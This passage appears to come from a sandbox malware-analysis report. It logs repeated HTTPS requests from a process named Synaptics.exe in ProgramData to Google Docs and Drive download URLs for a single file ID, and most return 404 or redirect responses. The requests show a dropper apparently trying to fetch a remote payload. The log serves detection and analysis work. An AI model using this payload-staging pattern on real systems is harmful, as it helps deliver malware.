                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 55 46 76 77 70 78 5f 59 5a 76 61 55 32 58 57 43 57 56 70 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="oUFvwpx_YZvaU2XWCWVpGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    43192.168.2.449813142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4AfqBtQhPbDtijPiqMfqPf3-ewQKuuRJT4qDXl2kTnRB4conf6QvA6x7XouugRuTP2
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-c71R6bbShKLlj3qKxtpGyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 50 78 69 6d 39 48 44 78 47 4f 7a 46 46 37 75 4d 58 64 35 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="rPxim9HDxGOzFF7uMXd5cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    44192.168.2.449817142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3yqYTVuCgGDEFG9jz69fXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    45192.168.2.449816142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4XSQo7gzj0xYJu4Wgsca2HKcfHtThZ2A4gPlYiV3c6BZ3NIoJwQyQYr9L9K7zdN5QR
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-T62Hbi0Abpa532f4bk3vDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 33 72 33 62 33 48 6a 5a 47 35 51 4f 37 62 53 6e 47 6e 46 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="o3r3b3HjZG5QO7bSnGnFqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    46192.168.2.449818142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UbJd_XBO6yMROtlfrc9_fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    47192.168.2.449819142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5tJHf4H4wg8BLFJONSAHJZm-kXJ9zP2gE6Yl9g5q0nXxIKHP3RGju89wN_uQJfeP4f
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-v9oVnnLZ_TdbiTuMsckhvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 47 30 30 6a 6d 54 2d 68 36 73 45 32 67 73 2d 44 45 63 39 35 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="nG00jmT-h6sE2gs-DEc95A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    48192.168.2.449822142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    49192.168.2.449824142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    50192.168.2.449821142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
